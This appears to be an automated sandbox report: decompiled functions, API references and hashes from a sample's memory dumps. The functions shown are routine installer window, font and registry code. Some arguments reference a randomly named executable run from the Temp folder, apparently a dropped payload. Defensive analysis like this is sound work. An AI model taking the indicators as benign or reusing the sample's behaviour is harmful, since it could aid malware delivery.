Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a220,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E0040644E();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32 ref: 00401D9A
GetClientRect.USER32 ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40cdd8 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40cddf = 1;
				 *0x40cddc = _t15 & 0x00000001;
				 *0x40cddd = _t15 & 0x00000002;
				 *0x40cdde = _t15 & 0x00000004;
				E00406544(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdc8);
				_push(_t18);
				_push(_t31);
				E0040644E();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32 ref: 00401E84

Part of subcall function 00406544: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743

CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E0040644E();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32 ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D10(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406544(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406544(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406544(_t44, _t50, 0x423708, 0x423708, _a8);
				wsprintfW(_t34 + lstrlenW(0x423708) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x4291f8, _a4, 0x423708);
			}

0x00404d19
0x00404d1e
0x00404d26
0x00404d27
0x00404d34
0x00404d3c
0x00404d3d
0x00404d3f
0x00404d41
0x00404d43
0x00404d46
0x00404d46
0x00404d4d
0x00404d53
0x00404d53
0x00404d5a
0x00404d61
0x00404d64
0x00404d67
0x00404d67
0x00404d6b
0x00404d7b
0x00404d7d
0x00404d80
0x00404d29
0x00404d29
0x00404d30
0x00404d30
0x00404d88
0x00404d93
0x00404da9
0x00404dba
0x00404dd6

APIs

lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
wsprintfW.USER32 ref: 00404DBA
SetDlgItemTextW.USER32 ref: 00404DCD

Strings

%u.%u%s%s, xrefs: 00404D9B

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
Opcode Fuzzy Hash: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8

Uniqueness

Uniqueness Score: -1.00%

Function 00405DD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405DD6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405dd7
0x00405de4
0x00405de5
0x00405df0
0x00405df8
0x00405df8
0x00405e00

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3936084776
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x420ec0 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x42a22c) {
							_t3 = CreateDialogParamW( *0x42a220, 0x6f, 0, E00402F93, 0);
							 *0x420ec0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406910(0);
					}
				} else {
					_t6 =  *0x420ec0;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420ec0 = 0;
					return _t6;
				}
			}

0x00403020
0x00403040
0x0040304a
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32 ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C

Uniqueness

Uniqueness Score: -1.00%

Function 004054DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004054DD(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x4236f4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x4236f4 = _t16;
							E00404E9E();
						}
						L11:
						return CallWindowProcW( *0x4236fc, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E1E(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044AF(0x413);
				return 0;
			}

0x004054e1
0x004054eb
0x00405507
0x00405529
0x0040552c
0x00405532
0x0040553c
0x0040553d
0x0040553f
0x00405545
0x00405545
0x0040554f
0x00000000
0x0040555d
0x00405514
0x0040554c
0x0040554c
0x00000000
0x0040554c
0x00405520
0x00405522
0x00000000
0x00405522
0x004054f1
0x00000000
0x00000000
0x004054f8
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040550C
CallWindowProcW.USER32(?,?,?,?), ref: 0040555D

Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

Strings

, xrefs: 004054ED

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A

Uniqueness

Uniqueness Score: -1.00%

Function 004063D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004063D5(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E00406374(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x004063e3
0x004063e5
0x004063fd
0x00406402
0x00406407
0x00406445
0x00406445
0x00406409
0x0040641b
0x00406426
0x0040642c
0x00406437
0x00000000
0x00000000
0x00406437
0x0040644b

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,004226E8,00000000,?,?,C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,?,?,0040663C,80000002), ref: 0040641B
